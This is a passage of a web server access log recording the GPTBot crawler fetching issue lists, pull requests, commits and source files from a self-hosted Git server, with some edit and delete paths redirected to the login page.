"/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:18:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__init__.py" [Client 74.7.227.38] [Length 23888] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:18:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9835] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 18041] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:18:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:18:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:18:15:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:18:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:18:15:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:18:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:18:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:18:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13144] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13144] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176812] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" -[17/Feb/2026:18:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481684] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" -[17/Feb/2026:18:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23938] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" -[17/Feb/2026:18:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176808] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" -[17/Feb/2026:18:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22702] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" -[17/Feb/2026:18:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13351] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11614] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:18:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15833] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:18:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14509] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:18:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:15:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:18:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:15:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11928] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 